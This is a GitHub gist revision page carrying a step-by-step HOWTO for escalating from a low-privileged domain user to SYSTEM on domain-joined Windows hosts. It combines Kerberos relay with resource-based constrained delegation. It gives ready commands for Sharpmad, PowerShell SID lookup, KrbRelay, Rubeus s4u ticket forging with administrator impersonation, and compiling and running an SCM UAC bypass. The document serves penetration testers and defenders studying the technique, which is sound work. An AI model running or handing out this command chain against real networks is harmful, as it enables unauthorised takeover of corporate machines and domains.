-
-
Save secdev02/ce5500c2c7bb2aa40d08b791326e63c8 to your computer and use it in GitHub Desktop.
Revisions
-
tothi revised this gist
Nov 17, 2023 . 1 changed file with 8 additions and 0 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -33,6 +33,14 @@ $o = ([ADSI]"LDAP://CN=evilcomputer,CN=Computers,DC=ecorp,DC=local").objectSID (New-Object System.Security.Principal.SecurityIdentifier($o.value, 0)).Value ``` Alternative way (without knowing the full DN): ``` $f = "(&(objectCategroy=computer)(objectClass=computer)(cn=evilcomputer))" $s = ([ADSISearcher]$f).FindOne().Properties.objectSID (New-Object System.Security.Principal.SecurityIdentifier([byte[]]($s | Out-String -Stream), 0)).Value ``` 3.) Abuse the attribute `msDS-AllowedToActOnBehalfOfOtherIdentity` of the target (desktop12.ecorp.local) computer account by launching the awesome Kerberos Relay attack using [KrbRelay](https://github.com/cube0x0/KrbRelay). -
Apr 27, 2022 . 1 changed file with 1 addition and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -86,7 +86,7 @@ SCMUACBypass.exe You should have a System shell in the end. :) +1.) Cleanup: remove the service created by the previous step (what launched `cmd.exe`), in the system shell: ``` sc delete UacBypassedService -
Apr 27, 2022 . 1 changed file with 6 additions and 0 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -85,3 +85,9 @@ SCMUACBypass.exe ``` You should have a System shell in the end. :) +1.) Cleanup: remove the service created by the previous step and lanuched `cmd.exe` (in the system shell): ``` sc delete UacBypassedService ``` -
Apr 27, 2022 . 1 changed file with 9 additions and 0 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -2,6 +2,15 @@ Short HOWTO about one use case of the work from Cube0x0 ([KrbRelay](https://github.com/cube0x0/KrbRelay)) and others. ## TL;DR No-Fix Local Privilege Escalation from low-priviliged domain user to local system on domain-joined computers. Prerequisites: * LDAP signing not required on Domain Controller (default!) * Ability for the current domain user to add computers to the domain (ms-DS-MachineAccountQuota = 10 by default!) or an owned computer account ## Brief Kerberos Relay Attack adds a fake (or owned) computer account to the target's msDS-AllowedToActOnBehalfOfOtherIdentity -
Apr 27, 2022 .There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,78 @@ # KrbRelay with RBCD Privilege Escalation HOWTO Short HOWTO about one use case of the work from Cube0x0 ([KrbRelay](https://github.com/cube0x0/KrbRelay)) and others. ## Brief Kerberos Relay Attack adds a fake (or owned) computer account to the target's msDS-AllowedToActOnBehalfOfOtherIdentity attribute, making it possible to perform a Resource-Based Constrained Delegation Attack against the target. The result of the RBCD attack is Silver Ticket access to the target, which can be used for local admin access remotely or even locally (meaning privilege escalation) by patching the Win32 Service Control Manager to use Kerberos Authentication locally. ## Technical Steps for the PrivEsc 1.) Add a computer account with [SharpMad](https://github.com/Kevin-Robertson/Sharpmad) (or use an owned one): ``` Sharpmad.exe MAQ -Action new -MachineAccount evilcomputer -MachinePassword pass.123 ``` 2.) Get the SID of that computer object with PowerShell: ``` $o = ([ADSI]"LDAP://CN=evilcomputer,CN=Computers,DC=ecorp,DC=local").objectSID (New-Object System.Security.Principal.SecurityIdentifier($o.value, 0)).Value ``` 3.) Abuse the attribute `msDS-AllowedToActOnBehalfOfOtherIdentity` of the target (desktop12.ecorp.local) computer account by launching the awesome Kerberos Relay attack using [KrbRelay](https://github.com/cube0x0/KrbRelay). First get a suitable port for COM: ``` CheckPort.exe ``` Then use the returned port value and the SID value from Step 2 for the attack: ``` KrbRelay.exe -spn ldap/dc1.ecorp.local -clsid 90f18417-f0f1-484e-9d3c-59dceee5dbd8 -rbcd S-1-5-21-3239103757-393380102-551265849-2110 -port 10 ``` For this working, LDAP signing on DC1 should not be required (default setting). Now the computer object `desktop12` should be allowed to act on behalf of the created/owned `evilcomputer` account. This was the key step for this attack. The following is generic RBCD Abuse. 4.) Use the [S4U Action](https://github.com/GhostPack/Rubeus#s4u) of [Rubeus](https://github.com/GhostPack/Rubeus) for getting Kerberos tickets with SPNs and impersonated to local admin access. First calculate the NTLM hash of the owned computer account password: ``` Rubeus.exe hash /password:pass.123 ``` And get a Kerberos ticket with the `HOST/DESKTOP12` SPN (using for SCM access later) and inject into the current session: ``` Rubeus.exe s4u /user:evilcomputer$ /rc4:DBA335196E8CE3DEDB7140452ADEE42D /impersonateuser:administrator /msdsspn:host/desktop12 /ptt ``` Note that computername without FQDN part should be used for the SPN (to make it match for the tool used in the next step). 5.) Patch the Win32 API in Service Control Manager for using Kerberos tickets in local authentication and privesc to `NT AUTHORITY\System` by creating a service (launching `cmd.exe`). Here it is from Tyranid: https://gist.github.com/tyranid/c24cfd1bd141d14d4925043ee7e03c82 Compile it (using cmdline Visual Studio): ``` cl -DUNICODE SCMUACBypass.cpp advapi32.lib ``` And launch it (in the session where the `HOST/Desktop12` ticket is available, check it with `klist`): ``` SCMUACBypass.exe ``` You should have a System shell in the end. :)